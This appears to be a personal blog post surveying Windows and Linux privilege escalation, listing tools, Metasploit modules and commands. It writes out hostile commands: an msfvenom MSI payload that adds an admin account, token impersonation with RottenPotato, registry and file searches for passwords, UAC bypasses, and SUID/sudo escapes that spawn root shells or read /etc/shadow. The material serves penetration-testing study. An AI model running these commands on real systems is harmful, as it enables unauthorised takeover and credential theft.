About Privilege Escalation

Recently I get some time to collect materials about privilege escalation, provide you with useful tools and some basic knowledge (overview, not details).

Windows

You can refer to Windows Privilege Escalation Fundamentals and Windows Privilege Escalation Guide.

We skip Information Gathering part and continue learning other things.

Kernel Exploit

Tools to search patch vulnerability

https://github.com/bitsadmin/wesng
https://github.com/ianxtianxt/win-exp-
https://github.com/SecWiki/windows-kernel-exploits

Or

# query manual
> systeminfo
> Wmic qfe get Caption,Description,HotFixID,InstalledOn

# MSF module
post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

# Powershell script
> Import-Module C:\Sherlock.ps1 (from `https://github.com/rasta-mouse/Sherlock`)
> Find-AllVulns

Or use crafted wmic_info.bat

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"

wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html

And some MSF exploits:
Windows ClientCopyImage Win32k Exploit

• Windows 7 x64, x86, Windows 2008 R2 SP1 x64
• exploit/windows/local/ms15_051_client_copy_image

Windows TrackPopupMenu Win32k NULL pointer dereference

• Windows XP SP3, Windows Server 2003 SP2, Windows 7 SP1 Windows Server 2008 32, Windows Server 2008 R2 SP1 64
• exploit/windows/local/ms14_058_track_popup_menu

KiTrap0D exploit

• Windows Server 2003 32, Windows Server 2008 32, Windows 7 32, Windows XP
• exploit/windows/local/ms10_015_kitrap0d

Task Scheduler XML escalation

• Windows Vista, Windows 7, Windows Server 2008 x64 and x86
• exploit/windows/local/ms10_092_schelevator

MS16-016 mrxdav.sys WebDav local escalation

• Windows 7 SP1 x86
• exploit/windows/local/ms16_016_webdav

EPATHOBJ::pprFlattenRec local escalation

• Windows XP SP3, Windows 2003 SP1, Windows 7 SP1
• exploit/windows/local/ppr_flatten_rec

MS13-053 : NTUserMessageCall Win32k kernel pool overflow

• Windows 7 SP1 x86
• exploit/windows/local/ms13_053_ schlamperei

MS16-032 Secondary Logon Handle escalation

• Windows 7-10, 2k8-2k12 32/64, Powershell 2.0 and higher Windows version
• exploit/windows/local/ms16_032_secondary_logon_handle_privesc

RottenPotato

meterpreter> load incognito # or use incognito
meterpreter> list_token -u  # see any token to use
WIN-2HU3N1\Administrator
meterpreter> impersonate_token WIN-2HU3N1\\Administrator
# or use rotten potato directly
$ git clone https://github.com/foxglovesec/RottenPotato.git
$ cd RottenPotato
# find rottenpotato.exe
meterpreter> upload /root/Desktop/RottenPotato/rottenpotato.exe .
meterpreter> execute -Hc -f rottenpotato.exe
meterpreter> impersonate_token "NT AUTHORITY\\SYSTEM"

Config Error

This includes system service priv setting error, trusted service path vulns, scheduled tasks.

Methods to check:

# Empire module
privesc/powerup/allchecks

System service privilege config:
As services started when booting up are with high privs, if they are exploitable, we can use them to elevate.

# Powershell attack script
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
# MSF attack module, need a given session
exploit/windows/local/service_permissions

Trusted service path vulns:
If a service executable path is without " and has <space>, then it is vulnerable.

# Search vulnerable service
> wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# MSF attack module
exploit/windows/local/trusted_service_path
# Need to migrate, because it disconnect automatically
set AutoRunScript migrate -f

Scheduled tasks:
Since tasks executed by high privileged users, if service dirs are editable, they are vlunerable.

# Check scheduled tasks 
> schtasks /query /fo LIST /v
# Check privs of specified dir
> accesschk.exe -dqv "D:\test" -accepteula

GPP Privilege Escalation

Group Policy Preferences (GPP)

# Powershell obtain cpassword
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
#MSF
post/windows/gather/credentials/gpp
#Empire
usemodule privesc/gpp

Bypass UAC

#MSF
exploit/windows/local/ask       # pop up a window, click to get system
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_fodhelper
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_comhijack
#Powershell
https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1
#Empire
usemodule privesc/bypassuac
usemodule privesc/bypassuac_wscript

Token Stealing

Use RottenPotato.

Without Token

Use Responder.py

For Different OS Version

1. Windows2000/2003, XP
   Use at(set scheduled tasks) to let users in Administrator group elevated to SYSTEM

2. Windows 7/8, 03/08, 12/16

• sc to control service

  > sc Create syscmd binPath= "cmd /K start" type= own type= interact
  > sc start systcmd

• AlwaysInstallElevated: allow non-admin users run *.msi to install with SYSTEM privs

  # disabled by default
  [HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001
  [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001
  # check using
  C:> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  # or
  C:> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  # if not vulnerable
  ERROR: The system was unable to find the specified registry key or value.
  # else it prints key values
  
  # attack
  > msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o rotten.msi
  > msiexec /quiet /qn /i C:\programdata\rotten.msi
  # /quiet    forbid sending messages to user when installing
  # /qn       no GUI
  # /i        specify the program
  
  # MSF module
  exploit/windows/local/always_install_elevated

• Unattended Installs: a XML file named Unattended, contains all configs about program installation, like account config
  They are under dirs:

  C:\Windows\Panther\
  C:\Windows\Panther\Unattend\
  C:\Windows\System32\
  C:\Windows\System32\sysprep\

  Except Unattend.xml, the sysprep.xml and sysprep.inf are also contains something

  > dir C:*vnc.ini /s /b /c
  > dir C:\ /s /b /c | findstr /sr *password*
  > findstr /si password *.txt | *.xml | *.ini
  > reg query HKLM /f password /t REG_SZ /s
  > reg query HKCU /f password /t REG_SZ /s
  # MSF module
  post/windows/gather/enum_unattend

3. CVE

• Windows10 CVE-2020-0796
• Windows7/2008 CVE-2018-8120
• Windows7/8、2008/2012/2016 CVE-2017-0213
• SQL Server, IIS (just for local, not domain) MS16-075(RottenPotato)

Other Methods

For there are toooo much knowledge to mention, maybe it’s better to google just when you need them.

Linux

You can refer to Basic Linux Privilege Escalation, and info gathering part is related to Linux Security Response .
Here recommends some tools:

• LinEnum
• pspy - unprivileged Linux process snooping
• unix-privesc-check
• Linprivchecker.py

Kernel Exploit

Normally we should have:

1. vulnerable kernel
2. corresponding exploit program
3. able to transfer exploit to the target
4. able to run it, and let kernel run our payload

Search exploits by

site:exploit-db.com kernel version python linprivchecker.py extended

Some CVEs for example: CVE-2015-1328, CVE-2016-5195, CVE-2017-16995, CVE-2018-18955, CVE-2018-1000001, CVE-2019-13272. To test them, visit This and That for old images and old kernels.

DirtyCow(CVE-2016-5195) is a typical vulnerability to perform privilege escalation, which can handle many kernel versions: PoCs

More exploit can be found at linux-kernel-exploits, but it is not recommended, because after that computer may be unstable and easy to crash.

SUID

This part can refer to SUID Executables by penetration testing lab.

Other methods:

• Use cp to overwrite /etc/shadow
• Use mv to overwrite /etc/shadow, /etc/sudoers
• awk: awk 'BEGIN {system("/bin/bash")}'
• man:
  • man passwd
  • !/bin/bash
• python/perl/ruby/lua/etc
  • refer to About Reverse Shell
• tcpdump

  $ echo $'id\ncat /etc/shadow' > /tmp/.test
  $ chmod +x /tmp/.test
  $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

A cheat sheet for Linux privilege escalation is GTFOBins.

echo ‘import os,stat ;os.chmod(“/etc/passwd”, stat.S_IRWXU|stat.S_IRWXG|stat.S_IRWXO)’ >> test.py

SUDO

The sudo command is to let normal user execute one command as root user, and the configurations are stored in /etc/sudoers.

Format of /etc/sudoers should be like

root ALL=(ALL) ALL
# let `root` user on `ALL(1)` terminal to be as `ALL(1)` user to execute `ALL(3)` commands
attacker ALL=(ALL) NOPASSWD:ALL

Use sudo -l to list all allowed commands, the exploit methods are similar to SUID.

Cronjob

Since the crontab tasks are executed by root user, if any config file is editable by normal users, you can let root user execute anything you want.

To sum up, the SUID, SUDO and Cron jobs all depends on writing things by normal user and being executed by root user

. in $PATH

We always run binary in current dir with ./binary, while if we add . in $PATH we can run binary directly.

However if attackers make an evil ls or cat or something, and lure root user to enter that dir and execute, it is attacked.

Other Techniques

Exploiting Wildcard for Privilege Escalation

Other Useful Tools

Windows-Exploit-Suggester and Linux_Exploit_Suggester (quite old).

gtfo which searches the GTFOBins (for linux) and LOLBAS (for windows) in Python 3, and LOOBins (for MacOS), using system commands to elevate.

PEASS - Privilege Escalation Awesome Scripts SUITE also provides exploit for both linux and windows.

A curated list of awesome privilege escalation: Awesome Privilege Escalation

A pack for Windows-exploits.

Besides there are BeRoot to find config errors, Vulmap and WindowsVulnScan to scan vulns.

Online searching includes (in Chinese):

• https://detect.secwx.com/
• http://bugs.hacking8.com/tiquan/
• https://i.hacking8.com/tiquan/